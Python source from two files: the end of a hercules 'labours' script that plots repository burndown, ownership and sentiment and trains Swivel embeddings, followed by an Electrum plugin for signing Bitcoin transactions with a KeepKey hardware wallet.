        labels[startindex].set_text = lambda _: None
        labels[startindex].set_rotation(30)
        labels[startindex].set_ha("right")
    if endindex >= 0:
        # same trick for the last tick label
        labels[endindex].set_text(date_range_sampling[-1].date())
        labels[endindex].set_text = lambda _: None
        labels[endindex].set_rotation(30)
        labels[endindex].set_ha("right")
    title = "%s %d x %d (granularity %d, sampling %d)" % \
            ((name,) + matrix.shape + (granularity, sampling))
    output = args.output
    if output:
        if args.mode == "project" and target == "project":
            output = args.output
        else:
            if target == "project":
                name = "project"
            output = get_plot_path(args.output, name)
    deploy_plot(title, output, args.style)
def plot_many_burndown(args, target, header, parts):
    """Plot a burndown chart for every (name, matrix) pair in *parts*."""
    if not args.output:
        print("Warning: output not set, showing %d plots." % len(parts))
    iterator = progress.bar(parts, expected_size=len(parts)) \
        if progress is not None else parts
    # buffer each plot's stdout chatter and replay it at the end so it does
    # not interleave with the progress bar
    captured = io.StringIO()
    real_stdout = sys.stdout
    for name, matrix in iterator:
        sys.stdout = captured
        plot_burndown(args, target, *load_burndown(header, name, matrix, args.resample))
        sys.stdout = real_stdout
    sys.stdout.write(captured.getvalue())
def plot_churn_matrix(args, repo, people, matrix):
    """Render the developers' overwrite (churn) matrix, or dump it to JSON."""
    if args.output and args.output.endswith(".json"):
        data = locals().copy()
        del data["args"]
        data["type"] = "churn_matrix"
        if args.mode == "all":
            output = get_plot_path(args.output, "matrix")
        else:
            output = args.output
        with open(output, "w") as fout:
            json.dump(data, fout, sort_keys=True, default=default_json)
        return

    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot

    # scale the square figure with the number of matrix columns
    s = 4 + matrix.shape[1] * 0.3
    fig = pyplot.figure(figsize=(s, s))
    ax = fig.add_subplot(111)
    ax.xaxis.set_label_position("top")
    ax.matshow(matrix, cmap=pyplot.cm.OrRd)
    ax.set_xticks(numpy.arange(0, matrix.shape[1]))
    ax.set_yticks(numpy.arange(0, matrix.shape[0]))
    ax.set_yticklabels(people, va="center")
    # minor ticks at cell boundaries drive the grid lines below
    ax.set_xticks(numpy.arange(0.5, matrix.shape[1] + 0.5), minor=True)
    ax.set_xticklabels(["Unidentified"] + people, rotation=45, ha="left",
                       va="bottom", rotation_mode="anchor")
    ax.set_yticks(numpy.arange(0.5, matrix.shape[0] + 0.5), minor=True)
    ax.grid(which="minor")
    apply_plot_style(fig, ax, None, args.style, args.text_size, args.size)
    if not args.output:
        # interactive display: nudge the axes so rotated labels fit
        pos1 = ax.get_position()
        pos2 = (pos1.x0 + 0.15, pos1.y0 - 0.1, pos1.width * 0.9, pos1.height * 0.9)
        ax.set_position(pos2)
    if args.mode == "all":
        output = get_plot_path(args.output, "matrix")
    else:
        output = args.output
    title = "%s %d developers overwrite" % (repo, matrix.shape[0])
    if args.output:
        # FIXME(vmarkovtsev): otherwise the title is screwed in savefig()
        title = ""
    deploy_plot(title, output, args.style)
def plot_ownership(args, repo, names, people, date_range, last):
    """Plot a stacked area chart of code ownership through time.

    :param args: parsed CLI arguments (output, mode, backend, relative, style,
        text_size, size).
    :param repo: repository name used in the plot title.
    :param names: developer names, one per row of ``people``.
    :param people: 2D numpy array; rows are developers, columns are dates.
    :param date_range: x axis values matching the columns of ``people``.
    :param last: right boundary of the x axis.
    """
    if args.output and args.output.endswith(".json"):
        # JSON mode: dump the raw data instead of drawing anything.
        data = locals().copy()
        del data["args"]
        data["type"] = "ownership"
        if args.mode == "all":
            output = get_plot_path(args.output, "people")
        else:
            output = args.output
        with open(output, "w") as fout:
            json.dump(data, fout, sort_keys=True, default=default_json)
        return
    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot
    if args.relative:
        # BUG FIX: normalize each date column to sum to 1 *before* plotting.
        # Previously this in-place division ran after stackplot() had already
        # consumed the data, so --relative had no effect on the drawn chart.
        for i in range(people.shape[1]):
            people[:, i] /= people[:, i].sum()
    pyplot.stackplot(date_range, people, labels=names)
    pyplot.xlim(date_range[0], last)
    if args.relative:
        pyplot.ylim(0, 1)
        legend_loc = 3
    else:
        legend_loc = 2
    legend = pyplot.legend(loc=legend_loc, fontsize=args.text_size)
    apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
    if args.mode == "all":
        output = get_plot_path(args.output, "people")
    else:
        output = args.output
    deploy_plot("%s code ownership through time" % repo, output, args.style)
# Target Swivel submatrix shard size; train_embeddings() trims the matrix so
# that it divides evenly into shards of (roughly) this size.
IDEAL_SHARD_SIZE = 4096
def train_embeddings(index, matrix, tmpdir, shard_size=IDEAL_SHARD_SIZE):
    """Train Swivel embeddings over a square co-occurrence matrix.

    :param index: item names; index[i] labels row/column i of ``matrix``.
    :param matrix: square scipy sparse matrix (CSR-like: .indptr/.data are
        used) of co-occurrence counts — assumed from usage, confirm caller.
    :param tmpdir: directory for the temporary Swivel workspace (falsy ->
        system default).
    :param shard_size: target Swivel submatrix shard size.
    :return: (meta_index, embeddings) — meta_index is a list of
        (name, diagonal count) pairs, embeddings the matching vectors
        (average of row and column embedding).
    """
    try:
        from . import swivel
    except (SystemError, ImportError):
        import swivel
    import tensorflow as tf
    assert matrix.shape[0] == matrix.shape[1]
    assert len(index) <= matrix.shape[0]
    # Clip extreme counts at the 99th percentile to tame outliers.
    outlier_threshold = numpy.percentile(matrix.data, 99)
    matrix.data[matrix.data > outlier_threshold] = outlier_threshold
    nshards = len(index) // shard_size
    if nshards * shard_size < len(index):
        # Doesn't divide evenly: bump the shard count and shrink the shards.
        nshards += 1
        shard_size = len(index) // nshards
        nshards = len(index) // shard_size
    remainder = len(index) - nshards * shard_size
    if remainder > 0:
        # Drop the rows with the fewest nonzeros so shards divide evenly.
        lengths = matrix.indptr[1:] - matrix.indptr[:-1]
        filtered = sorted(numpy.argsort(lengths)[remainder:])
    else:
        filtered = list(range(len(index)))
    if len(filtered) < matrix.shape[0]:
        print("Truncating the sparse matrix...")
        matrix = matrix[filtered, :][:, filtered]
    # Keep (name, self co-occurrence) for every surviving item.
    meta_index = []
    for i, j in enumerate(filtered):
        meta_index.append((index[j], matrix[i, i]))
    index = [mi[0] for mi in meta_index]
    with tempfile.TemporaryDirectory(prefix="hercules_labours_", dir=tmpdir or None) as tmproot:
        print("Writing Swivel metadata...")
        vocabulary = "\n".join(index)
        with open(os.path.join(tmproot, "row_vocab.txt"), "w") as out:
            out.write(vocabulary)
        with open(os.path.join(tmproot, "col_vocab.txt"), "w") as out:
            out.write(vocabulary)
        del vocabulary
        # Number of nonzeros per row, used both as marginals and for ordering.
        bool_sums = matrix.indptr[1:] - matrix.indptr[:-1]
        bool_sums_str = "\n".join(map(str, bool_sums.tolist()))
        with open(os.path.join(tmproot, "row_sums.txt"), "w") as out:
            out.write(bool_sums_str)
        with open(os.path.join(tmproot, "col_sums.txt"), "w") as out:
            out.write(bool_sums_str)
        del bool_sums_str
        # Interleave rows by popularity (descending) so shards are balanced.
        reorder = numpy.argsort(-bool_sums)
        print("Writing Swivel shards...")
        for row in range(nshards):
            for col in range(nshards):
                def _int64s(xs):
                    return tf.train.Feature(
                        int64_list=tf.train.Int64List(value=list(xs)))

                def _floats(xs):
                    return tf.train.Feature(
                        float_list=tf.train.FloatList(value=list(xs)))

                indices_row = reorder[row::nshards]
                indices_col = reorder[col::nshards]
                shard = matrix[indices_row][:, indices_col].tocoo()
                example = tf.train.Example(features=tf.train.Features(feature={
                    "global_row": _int64s(indices_row),
                    "global_col": _int64s(indices_col),
                    "sparse_local_row": _int64s(shard.row),
                    "sparse_local_col": _int64s(shard.col),
                    "sparse_value": _floats(shard.data)}))
                with open(os.path.join(tmproot, "shard-%03d-%03d.pb" % (row, col)), "wb") as out:
                    out.write(example.SerializeToString())
        print("Training Swivel model...")
        swivel.FLAGS.submatrix_rows = shard_size
        swivel.FLAGS.submatrix_cols = shard_size
        # Scale embedding size and epoch budget with the vocabulary size.
        if len(meta_index) <= IDEAL_SHARD_SIZE / 16:
            embedding_size = 50
            num_epochs = 100000
        elif len(meta_index) <= IDEAL_SHARD_SIZE:
            embedding_size = 50
            num_epochs = 50000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 2:
            embedding_size = 60
            num_epochs = 10000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 4:
            embedding_size = 70
            num_epochs = 8000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 10:
            embedding_size = 80
            num_epochs = 5000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 25:
            embedding_size = 100
            num_epochs = 1000
        elif len(meta_index) <= IDEAL_SHARD_SIZE * 100:
            embedding_size = 200
            num_epochs = 600
        else:
            embedding_size = 300
            num_epochs = 300
        if os.getenv("CI"):
            # Travis, AppVeyor etc. during the integration tests
            # NOTE(review): true division leaves num_epochs a float here —
            # confirm swivel accepts a non-integer epoch count.
            num_epochs /= 10
        swivel.FLAGS.embedding_size = embedding_size
        swivel.FLAGS.input_base_path = tmproot
        swivel.FLAGS.output_base_path = tmproot
        swivel.FLAGS.loss_multiplier = 1.0 / shard_size
        swivel.FLAGS.num_epochs = num_epochs
        # Tensorflow 1.5 parses sys.argv unconditionally *applause*
        argv_backup = sys.argv[1:]
        del sys.argv[1:]
        swivel.main(None)
        sys.argv.extend(argv_backup)
        print("Reading Swivel embeddings...")
        embeddings = []
        with open(os.path.join(tmproot, "row_embedding.tsv")) as frow:
            with open(os.path.join(tmproot, "col_embedding.tsv")) as fcol:
                for i, (lrow, lcol) in enumerate(zip(frow, fcol)):
                    prow, pcol = (l.split("\t", 1) for l in (lrow, lcol))
                    assert prow[0] == pcol[0]
                    erow, ecol = \
                        (numpy.fromstring(p[1], dtype=numpy.float32, sep="\t")
                         for p in (prow, pcol))
                    # Average the row and column embeddings of each item.
                    embeddings.append((erow + ecol) / 2)
    return meta_index, embeddings
class CORSWebServer(object):
    """Serves the current directory over HTTP on a background thread, adding
    a CORS header so the Tensorflow Projector site can fetch the files."""

    def __init__(self):
        self.thread = threading.Thread(target=self.serve)
        # Set by ClojureServer.__init__ once serving has started.
        self.server = None

    def serve(self):
        """Thread target: run the stdlib HTTP test server forever."""
        outer = self

        try:
            from http.server import HTTPServer, SimpleHTTPRequestHandler, test
        except ImportError:  # Python 2
            from BaseHTTPServer import HTTPServer, test
            from SimpleHTTPServer import SimpleHTTPRequestHandler

        class ClojureServer(HTTPServer):
            # Captures the server instance into the outer object (a
            # closure — hence the pun in the name) so stop() can reach it.
            def __init__(self, *args, **kwargs):
                HTTPServer.__init__(self, *args, **kwargs)
                outer.server = self

        class CORSRequestHandler(SimpleHTTPRequestHandler):
            def end_headers(self):
                # Allow cross-origin requests (projector.tensorflow.org).
                self.send_header("Access-Control-Allow-Origin", "*")
                SimpleHTTPRequestHandler.end_headers(self)

        test(CORSRequestHandler, ClojureServer)

    def start(self):
        self.thread.start()

    def stop(self):
        if self.running:
            self.server.shutdown()
            self.thread.join()

    @property
    def running(self):
        # True once serve() has instantiated the HTTP server.
        return self.server is not None
# Module-level singleton used by write_embeddings() and main() to serve the
# generated projector files.
web_server = CORSWebServer()
def write_embeddings(name, output, run_server, index, embeddings):
    """Write Tensorflow Projector files: meta TSV, data TSV and JSON config.

    :param name: entity kind (e.g. "files", "people"); used in file names.
    :param output: output path prefix; falsy -> "couples_<name>".
    :param run_server: if True, serve the files over HTTP on port 8000 and
        open the Tensorflow Projector pointed at them.
    :param index: iterable of (name, commits) pairs for the metadata TSV.
    :param embeddings: list of embedding vectors, one per index entry.
    """
    print("Writing Tensorflow Projector files...")
    if not output:
        output = "couples_" + name
    if output.endswith(".json"):
        # JSON output mode elsewhere in the tool: write next to it, no server.
        output = os.path.join(output[:-5], "couples")
        run_server = False
    metaf = "%s_%s_meta.tsv" % (output, name)
    with open(metaf, "w") as fout:
        fout.write("name\tcommits\n")
        for pair in index:
            fout.write("%s\t%s\n" % pair)
    print("Wrote", metaf)
    dataf = "%s_%s_data.tsv" % (output, name)
    with open(dataf, "w") as fout:
        for vec in embeddings:
            fout.write("\t".join(str(v) for v in vec))
            fout.write("\n")
    print("Wrote", dataf)
    jsonf = "%s_%s.json" % (output, name)
    with open(jsonf, "w") as fout:
        fout.write("""{
  "embeddings": [
    {
      "tensorName": "%s %s coupling",
      "tensorShape": [%s, %s],
      "tensorPath": "http://0.0.0.0:8000/%s",
      "metadataPath": "http://0.0.0.0:8000/%s"
    }
  ]
}
""" % (output, name, len(embeddings), len(embeddings[0]), dataf, metaf))
    print("Wrote %s" % jsonf)
    if run_server and not web_server.running:
        web_server.start()
    url = "http://projector.tensorflow.org/?config=http://0.0.0.0:8000/" + jsonf
    print(url)
    if run_server:
        # Prefer xdg-open, then $BROWSER; otherwise just print the URL.
        if shutil.which("xdg-open") is not None:
            os.system("xdg-open " + url)
        else:
            browser = os.getenv("BROWSER", "")
            if browser:
                os.system(browser + " " + url)
            else:
                print("\t" + url)
def show_shotness_stats(data):
    """Print structural hotness records sorted by hit count, descending.

    Each record contributes its counter at its own position in ``data``.
    """
    ranked = [(record.counters[idx], idx) for idx, record in enumerate(data)]
    ranked.sort(reverse=True)
    for count, idx in ranked:
        record = data[idx]
        print("%8d %s:%s [%s]" % (count, record.file, record.name, record.internal_role))
def show_sentiment_stats(args, name, resample, start, data):
    """Plot daily comment sentiment as bars: green positive, red negative.

    :param args: parsed CLI arguments (backend, style, text_size, size, output).
    :param name: repository name used in the title.
    :param resample: resampling frequency string; influences the tick locator.
    :param start: UNIX timestamp of day 0.
    :param data: mapping day offset -> record with a ``Value`` attribute,
        where 0.5 is neutral and smaller values are more positive (inferred
        from the 0.5 - Value transform below — confirm against the reader).
    """
    import matplotlib
    if args.backend:
        matplotlib.use(args.backend)
    import matplotlib.pyplot as pyplot
    start = datetime.fromtimestamp(start)
    data = sorted(data.items())
    xdates = [start + timedelta(days=d[0]) for d in data]
    xpos = []
    ypos = []
    xneg = []
    yneg = []
    for x, (_, y) in zip(xdates, data):
        # Center around the neutral 0.5: positive y means positive sentiment.
        y = 0.5 - y.Value
        if y > 0:
            xpos.append(x)
            ypos.append(y)
        else:
            xneg.append(x)
            yneg.append(y)
    pyplot.bar(xpos, ypos, color="g", label="Positive")
    pyplot.bar(xneg, yneg, color="r", label="Negative")
    legend = pyplot.legend(loc=1, fontsize=args.text_size)
    pyplot.ylabel("Lines of code")
    pyplot.xlabel("Time")
    apply_plot_style(pyplot.gcf(), pyplot.gca(), legend, args.style, args.text_size, args.size)
    pyplot.xlim(xdates[0], xdates[-1])
    locator = pyplot.gca().xaxis.get_major_locator()
    # set the optimal xticks locator
    if "M" not in resample:
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
    locs = pyplot.gca().get_xticks().tolist()
    if len(locs) >= 16:
        pyplot.gca().xaxis.set_major_locator(matplotlib.dates.YearLocator())
        locs = pyplot.gca().get_xticks().tolist()
        if len(locs) >= 16:
            # Still too many ticks: fall back to the original locator.
            pyplot.gca().xaxis.set_major_locator(locator)
    if locs[0] < pyplot.xlim()[0]:
        del locs[0]
    endindex = -1
    if len(locs) >= 2 and pyplot.xlim()[1] - locs[-1] > (locs[-1] - locs[-2]) / 2:
        # Add an explicit tick at the right edge of the plot.
        locs.append(pyplot.xlim()[1])
        endindex = len(locs) - 1
    startindex = -1
    if len(locs) >= 2 and locs[0] - pyplot.xlim()[0] > (locs[1] - locs[0]) / 2:
        # Add an explicit tick at the left edge of the plot.
        locs.append(pyplot.xlim()[0])
        startindex = len(locs) - 1
    pyplot.gca().set_xticks(locs)
    # hacking time!
    labels = pyplot.gca().get_xticklabels()
    if startindex >= 0:
        # Pin the edge label to the real first date and freeze it so later
        # formatting passes cannot overwrite the text.
        labels[startindex].set_text(xdates[0].date())
        labels[startindex].set_text = lambda _: None
        labels[startindex].set_rotation(30)
        labels[startindex].set_ha("right")
    if endindex >= 0:
        labels[endindex].set_text(xdates[-1].date())
        labels[endindex].set_text = lambda _: None
        labels[endindex].set_rotation(30)
        labels[endindex].set_ha("right")
    # Total positive/negative sentiment mass (Value < 0.5 counts as positive).
    overall_pos = sum(2 * (0.5 - d[1].Value) for d in data if d[1].Value < 0.5)
    overall_neg = sum(2 * (d[1].Value - 0.5) for d in data if d[1].Value > 0.5)
    title = "%s sentiment +%.1f -%.1f δ=%.1f" % (
        name, overall_pos, overall_neg, overall_pos - overall_neg)
    deploy_plot(title, args.output, args.style)
def main():
    """CLI entry point: load a hercules analysis dump and render the
    report(s) selected by ``args.mode`` ("all" runs every report)."""
    args = parse_args()
    reader = read_input(args)
    header = reader.get_header()
    name = reader.get_name()
    # Messages shown when the dump lacks the data a given mode needs.
    burndown_warning = "Burndown stats were not collected. Re-run hercules with --burndown."
    burndown_files_warning = \
        "Burndown stats for files were not collected. Re-run hercules with " \
        "--burndown --burndown-files."
    burndown_people_warning = \
        "Burndown stats for people were not collected. Re-run hercules with " \
        "--burndown --burndown-people."
    couples_warning = "Coupling stats were not collected. Re-run hercules with --couples."
    shotness_warning = "Structural hotness stats were not collected. Re-run hercules with " \
        "--shotness. Also check --languages - the output may be empty."
    sentiment_warning = "Sentiment stats were not collected. Re-run hercules with --sentiment."

    def run_times():
        # Print each analysis' run time and its share of the total.
        rt = reader.get_run_times()
        import pandas
        series = pandas.to_timedelta(pandas.Series(rt).sort_values(ascending=False), unit="s")
        df = pandas.concat([series, series / series.sum()], axis=1)
        df.columns = ["time", "ratio"]
        print(df)

    def project_burndown():
        # Whole-project burndown chart.
        try:
            full_header = header + reader.get_burndown_parameters()
        except KeyError:
            print("project: " + burndown_warning)
            return
        plot_burndown(args, "project",
                      *load_burndown(full_header, *reader.get_project_burndown(),
                                     resample=args.resample))

    def files_burndown():
        # One burndown chart per file.
        try:
            full_header = header + reader.get_burndown_parameters()
        except KeyError:
            print(burndown_warning)
            return
        try:
            plot_many_burndown(args, "file", full_header, reader.get_files_burndown())
        except KeyError:
            print("files: " + burndown_files_warning)

    def people_burndown():
        # One burndown chart per developer.
        try:
            full_header = header + reader.get_burndown_parameters()
        except KeyError:
            print(burndown_warning)
            return
        try:
            plot_many_burndown(args, "person", full_header, reader.get_people_burndown())
        except KeyError:
            print("people: " + burndown_people_warning)

    def churn_matrix():
        # Developer interaction ("overwrite") heatmap.
        try:
            plot_churn_matrix(args, name, *load_churn_matrix(
                *reader.get_people_interaction(), max_people=args.max_people))
        except KeyError:
            print("churn_matrix: " + burndown_people_warning)

    def ownership_burndown():
        # Stacked chart of code ownership through time.
        try:
            full_header = header + reader.get_burndown_parameters()
        except KeyError:
            print(burndown_warning)
            return
        try:
            plot_ownership(args, name, *load_ownership(
                full_header, *reader.get_ownership_burndown(), max_people=args.max_people))
        except KeyError:
            print("ownership: " + burndown_people_warning)

    def couples():
        # Train and export coupling embeddings; shotness co-occurrence is
        # optional and failures there are reported separately.
        try:
            write_embeddings("files", args.output, not args.disable_projector,
                             *train_embeddings(*reader.get_files_coocc(),
                                               tmpdir=args.couples_tmp_dir))
            write_embeddings("people", args.output, not args.disable_projector,
                             *train_embeddings(*reader.get_people_coocc(),
                                               tmpdir=args.couples_tmp_dir))
        except KeyError:
            print(couples_warning)
        try:
            write_embeddings("shotness", args.output, not args.disable_projector,
                             *train_embeddings(*reader.get_shotness_coocc(),
                                               tmpdir=args.couples_tmp_dir))
        except KeyError:
            print(shotness_warning)

    def shotness():
        # Textual structural hotness report.
        try:
            data = reader.get_shotness()
        except KeyError:
            print(shotness_warning)
            return
        show_shotness_stats(data)

    def sentiment():
        # Daily comment sentiment bar chart.
        try:
            data = reader.get_sentiment()
        except KeyError:
            print(sentiment_warning)
            return
        show_sentiment_stats(args, reader.get_name(), args.resample, reader.get_header()[0], data)

    # Dispatch on the requested mode.
    if args.mode == "run_times":
        run_times()
    elif args.mode == "project":
        project_burndown()
    elif args.mode == "file":
        files_burndown()
    elif args.mode == "person":
        people_burndown()
    elif args.mode == "churn_matrix":
        churn_matrix()
    elif args.mode == "ownership":
        ownership_burndown()
    elif args.mode == "couples":
        couples()
    elif args.mode == "shotness":
        shotness()
    elif args.mode == "sentiment":
        sentiment()
    elif args.mode == "all":
        project_burndown()
        files_burndown()
        people_burndown()
        churn_matrix()
        ownership_burndown()
        couples()
        shotness()
        sentiment()
    if web_server.running:
        # Keep serving the projector files for a while before shutting down.
        secs = int(os.getenv("COUPLES_SERVER_TIME", "60"))
        print("Sleeping for %d seconds, safe to Ctrl-C" % secs)
        sys.stdout.flush()
        try:
            time.sleep(secs)
        except KeyboardInterrupt:
            pass
        web_server.stop()
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.wallet import Standard_Wallet
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
# TIM_NEW: device generates a fresh seed; TIM_RECOVER: recover from a seed
# written down previously; TIM_MNEMONIC: upload a BIP39 mnemonic;
# TIM_PRIVKEY: upload a master private key (see initialize_device choices).
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
    """Keystore whose private keys live on a KeepKey hardware device."""
    hw_type = 'keepkey'
    device = 'KeepKey'

    def get_derivation(self):
        """Return the BIP32 derivation path prefix of this keystore."""
        return self.derivation

    def is_segwit(self):
        """True when the keystore uses the BIP49 (p2wpkh-p2sh) purpose."""
        return self.derivation.startswith("m/49'/")

    def get_client(self, force_pair=True):
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        # Message decryption is not supported by this plugin.
        raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign ``message`` with the key at <derivation>/<change>/<index>."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """Gather previous transactions and involved xpub paths, then delegate
        the actual signing to the plugin.  No-op when ``tx`` is complete."""
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy inputs need the full previous tx for offline signing;
            # segwit inputs are allowed through without it.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
    """Electrum hardware-wallet plugin driving KeepKey devices over HID."""
    # Derived classes provide:
    #
    #  class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, ckd_public, types, HidTransport

    firmware_URL = 'https://www.keepkey.com'
    libraries_URL = 'https://github.com/keepkey/python-keepkey'
    minimum_firmware = (1, 0, 0)
    keystore_class = KeepKey_KeyStore
    SUPPORTED_XTYPES = ('standard', )
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        """Import keepkeylib lazily; mark the plugin unavailable on failure."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            from . import client
            import keepkeylib
            import keepkeylib.ckd_public
            import keepkeylib.transport_hid
            self.client_class = client.KeepKeyClient
            self.ckd_public = keepkeylib.ckd_public
            self.types = keepkeylib.client.types
            self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
            self.device_manager().register_devices(self.DEVICE_IDS)
            self.libraries_available = True
        except ImportError:
            self.libraries_available = False

    def hid_transport(self, pair):
        from keepkeylib.transport_hid import HidTransport
        return HidTransport(pair)

    def _try_hid(self, device):
        """Open a HID transport to ``device``; return None on failure."""
        self.print_error("Trying to connect over USB...")
        if device.interface_number == 1:
            pair = [None, device.path]
        else:
            pair = [device.path, None]
        try:
            return self.hid_transport(pair)
        except BaseException as e:
            # see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
            # raise
            self.print_error("cannot connect at", device.path, str(e))
            return None

    def create_client(self, device, handler):
        """Connect, ping and firmware-check a device; return a client or None."""
        transport = self._try_hid(device)
        if not transport:
            self.print_error("cannot connect to device")
            return
        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None
        return client

    def get_client(self, keystore, force_pair=True):
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client

    def get_coin_name(self):
        """Coin name passed to the device; depends on mainnet vs testnet."""
        return "Testnet" if constants.net.TESTNET else "Bitcoin"

    def initialize_device(self, device_id, wizard, handler):
        # Initialization method
        msg = _("Choose how you want to initialize your {}.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your {}, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
                ).format(self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]

        def f(method):
            # Run the actual initialization on a daemon thread and block the
            # wizard's event loop until it reports an exit code.
            import threading
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            exit_code = wizard.loop.exec_()
            if exit_code != 0:
                # this method (initialize_device) was called with the expectation
                # of leaving the device in an initialized state when finishing.
                # signal that this is not the case:
                raise UserCancelled()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Wrapper around _initialize_device that reports errors to the
        handler and always exits the wizard loop with a status code."""
        exit_code = 0
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            exit_code = 1
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            handler.show_error(str(e))
            exit_code = 1
        finally:
            wizard.loop.exit(exit_code)

    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Perform the chosen TIM_* initialization on the device."""
        item, label, pin_protection, passphrase_protection = settings
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)

    def setup_device(self, device_info, wizard, purpose):
        """Prepare a device for use with a wallet, initializing it first if
        it has no seed yet."""
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        if client is None:
            raise Exception(_('Failed to create a client for this device.') + '\n' +
                            _('Make sure it is in the correct state.'))
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        client.get_xpub('m', 'standard')
        client.used()

    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Fetch the xpub at ``derivation`` from the device."""
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Sign ``tx`` on the device and merge the signatures back into it."""
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True, keystore.is_segwit())
        outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
        signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
        # Append SIGHASH_ALL ('01') to each DER signature.
        signatures = [(bh2u(x) + '01') for x in signatures]
        tx.update_signatures(signatures)

